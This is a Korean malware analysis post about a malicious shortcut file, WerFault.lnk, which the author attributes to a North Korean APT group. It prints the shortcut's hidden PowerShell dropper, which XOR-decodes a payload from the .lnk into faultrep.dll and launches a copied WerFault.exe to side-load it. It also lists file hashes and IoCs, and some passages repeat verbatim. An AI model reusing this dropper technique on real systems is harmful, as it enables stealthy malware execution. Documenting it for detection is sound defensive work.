북한 해킹 단체 라자루스(Lazarus) 추측이 되는 악성코드-WerFault.lnk(2024.8.19)
Contents
일단 북한 해킹 단체 라자루스(Lazarus) 추측이 되는 악성코드이며 해당 악성코드는 김수키 인지 라자루스 인지 Konni,라자루스(Lazarus)인지 모르겠지만, 아무튼 위쪽 북한에서 만든 APT입니다.
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:WerFault.lnk
사이즈:274 KB
MD5:e0c3282206b5533bb3272741212cb6e1
SHA-1:164107e62657aed8fe29d026f8a78fdba90e64c6
SHA-256:ac7772803e0f65522f43357cb31b0b032eebdaff35b1a5c1666a9d8b1a36784f
일단은 악성코드 안에는 WerFault 이라는 것이 포함돼 있습니다. WerFault.exe는 Windows 오류 보고 시스템의 일부입니다. 즉 정상적인 파일인데 악성코드 안의 내용은 다음과 같습니다.
/c copy %windir%\system32\WerFault(.)exe %tmp%\WerFault(.)exe && powershell
-windowstyle hidden $0dda91a2(1)b6f6536715eb83f21c75451 = G''et-Chil''dItem *(.)lnk
^| where-object {$_.le(n)gth -eq 0x(0)00449C8} ^| S''ele(c)t-Objec''t -Expand(P)roper
ty Name; $bdf6730d5c(5)2821e237a7ceb47d8838d = gc $0dda91(a)21b6f6536715eb83f21c75451 -
Encoding Byte; for($i=0; $i -lt $bdf6730(d)5c52821e237a7ceb47d8838d(.)count; $i++) { $bd
f6730d5c52821e2(3)7a7ceb47d8838d[$i] = $bdf673(0)d5c52821e237a7ceb47d8838d[$i] -bxor 0x71
}; $e248d8a354f7be2(6)afe13b86a3325e35 = '%temp%\faultrep(.)dll'; sc $e248d8a354f7(b)e26af
e13b86a3325e35 ([byte[]]($bdf6730(d)5c52821e237a7ceb47d8838d ^| select -Skip 012858)) -Enc
oding Byte; ^& %temp%\WerFault(.)exe;
iconlocation: C:\Program Files (x86)\Microsoft\Edge\Application\msedge(.)exe
}
악성코드 분석
1. 악성코드 명령어
/c copy %windir%\system32\WerFault(.)exe %tmp%\WerFault(.)exe:해당 명령은 WerFault(.)exe 파일을 C: \Windows\System32 폴더에서 %temp% 디렉터리(임시 폴더)로 복사 WerFault.exe 는 윈도우 오류 보고 도구(Windows Error Reporting tool)
powershell -windowstyl(e) hidden:PowerShell 스크립트를 실행하며 창을 숨김 모드로 실행 사용자는 해당 악성코드 실행이 되는 것을 모름
2. PowerShell 스크립트
$0dda91a21b6f(6)536715eb83f21c75451 = Get-ChildItem *(.)lnk | where-object {$_.length -eq 0x000449C8} …
먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:WerFault.lnk
사이즈:274 KB
MD5:e0c3282206b5533bb3272741212cb6e1
SHA-1:164107e62657aed8fe29d026f8a78fdba90e64c6
SHA-256:ac7772803e0f65522f43357cb31b0b032eebdaff35b1a5c1666a9d8b1a36784f
일단은 악성코드 안에는 WerFault 이라는 것이 포함돼 있습니다. WerFault.exe는 Windows 오류 보고 시스템의 일부입니다. 즉 정상적인 파일인데 악성코드 안의 내용은 다음과 같습니다.
/c copy %windir%\system32\WerFault(.)exe %tmp%\WerFault(.)exe && powershell
-windowstyle hidden $0dda91a2(1)b6f6536715eb83f21c75451 = G''et-Chil''dItem *(.)lnk
^| where-object {$_.le(n)gth -eq 0x(0)00449C8} ^| S''ele(c)t-Objec''t -Expand(P)roper
ty Name; $bdf6730d5c(5)2821e237a7ceb47d8838d = gc $0dda91(a)21b6f6536715eb83f21c75451 -
Encoding Byte; for($i=0; $i -lt $bdf6730(d)5c52821e237a7ceb47d8838d(.)count; $i++) { $bd
f6730d5c52821e2(3)7a7ceb47d8838d[$i] = $bdf673(0)d5c52821e237a7ceb47d8838d[$i] -bxor 0x71
}; $e248d8a354f7be2(6)afe13b86a3325e35 = '%temp%\faultrep(.)dll'; sc $e248d8a354f7(b)e26af
e13b86a3325e35 ([byte[]]($bdf6730(d)5c52821e237a7ceb47d8838d ^| select -Skip 012858)) -Enc
oding Byte; ^& %temp%\WerFault(.)exe;
iconlocation: C:\Program Files (x86)\Microsoft\Edge\Application\msedge(.)exe
}
악성코드 분석
1. 악성코드 명령어
/c copy %windir%\system32\WerFault(.)exe %tmp%\WerFault(.)exe:해당 명령은 WerFault(.)exe 파일을 C: \Windows\System32 폴더에서 %temp% 디렉터리(임시 폴더)로 복사 WerFault.exe 는 윈도우 오류 보고 도구(Windows Error Reporting tool)
powershell -windowstyl(e) hidden:PowerShell 스크립트를 실행하며 창을 숨김 모드로 실행 사용자는 해당 악성코드 실행이 되는 것을 모름
2. PowerShell 스크립트
$0dda91a21b6f(6)536715eb83f21c75451 = Get-ChildItem *(.)lnk | where-object {$_.length -eq 0x000449C8} …
IoC
0b1d881b010b2230a5ba9e5d9a0f0d31e00ccd6ebedd2568e002e6d35d9967ef
0dda91a21b6f6536715eb83f21c75451
164107e62657aed8fe29d026f8a78fdba90e64c6
5162e8b479835c2aff439bf5a0c5e70329d517f3
ac7772803e0f65522f43357cb31b0b032eebdaff35b1a5c1666a9d8b1a36784f
bdf6730d5c52821e237a7ceb47d8838d
e0c3282206b5533bb3272741212cb6e1
e4b8e64ba6493120c7728bddc844e628
0dda91a21b6f6536715eb83f21c75451
164107e62657aed8fe29d026f8a78fdba90e64c6
5162e8b479835c2aff439bf5a0c5e70329d517f3
ac7772803e0f65522f43357cb31b0b032eebdaff35b1a5c1666a9d8b1a36784f
bdf6730d5c52821e237a7ceb47d8838d
e0c3282206b5533bb3272741212cb6e1
e4b8e64ba6493120c7728bddc844e628